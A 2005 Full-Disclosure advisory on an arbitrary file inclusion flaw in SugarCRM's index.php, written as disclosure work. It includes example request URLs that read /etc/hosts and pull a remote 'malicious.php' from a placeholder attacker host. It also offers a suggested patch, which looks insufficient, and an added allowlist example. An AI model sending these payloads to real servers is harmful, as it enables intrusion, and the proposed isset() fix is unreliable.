[Full-Disclosure] Arbitrary file inclusion in SugarCRM [PHP]
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Arbitrary file inclusion in SugarCRM [PHP]
- From: Santiago Cortes <blindot@xxxxxxxxx>
- Date: Thu, 6 Jan 2005 16:46:41 -0500
------------------------------------------------------------
Arbitrary File Inclusion in SugarCRM
------------------------------------------------------------
Author: Santiago Cortés
Date: Jan 06, 2005
------------------------------------------------------------
Vulnerability:
index.php reads the file to include for the current module from the
$moduleDefaultFile array without checking where that array came from.
When PHP's "register_globals" is on, a request parameter of the same
name populates the array, so an attacker can make index.php include an
arbitrary local or remote file.
Example:
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php
Fix:
Disable register_globals in your php.ini file, or
Replace line 198 in index.php:
    $currentModuleFile = $moduleDefaultFile[$currentModule];
With:
    // Stop if no default file is registered for the requested module.
    if (!isset($moduleDefaultFile[$currentModule])) {
        die('No action specified');
    }
    $currentModuleFile = $moduleDefaultFile[$currentModule];
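For comparison, here is an added example of a module dispatcher that does not depend on register_globals being off (this is illustrative code, not SugarCRM's). Because register_globals fills $moduleDefaultFile from the request before the script's own code runs, the example defines the module-to-file map itself and treats it as the only allowlist; the module names and paths in it are assumed, not SugarCRM's real layout.

```php
<?php
// Added example, not SugarCRM's code: dispatch to a module file using a
// server-side allowlist, so request data can never choose the included path.

// Allowlist built here, in the script, not from the request. A parameter
// such as moduleDefaultFile[Home]=... cannot add or replace an entry because
// this assignment runs after register_globals has done its work.
// Module names and paths are illustrative placeholders.
$moduleDefaultFile = array(
    'Home'     => 'modules/Home/index.php',
    'Accounts' => 'modules/Accounts/index.php',
);

// Read the module name explicitly from $_GET instead of relying on
// register_globals to create $module for us.
$currentModule = isset($_GET['module']) ? (string) $_GET['module'] : 'Home';

// Only keys of the allowlist are acceptable; anything else is rejected.
if (!array_key_exists($currentModule, $moduleDefaultFile)) {
    header('HTTP/1.0 400 Bad Request');
    die('Unknown module');
}

$appRoot           = realpath(dirname(__FILE__));
$currentModuleFile = realpath($appRoot . '/' . $moduleDefaultFile[$currentModule]);

// Defence in depth: the resolved file must exist and lie under the
// application root, which also rules out remote URLs and traversal.
if ($currentModuleFile === false
    || strpos($currentModuleFile, $appRoot . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.0 500 Internal Server Error');
    die('Module file missing');
}

require $currentModuleFile;
```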
Disclaimer:
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of
this advisory.
Contact:
Santiago Cortés
blindot --at-- gmail
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html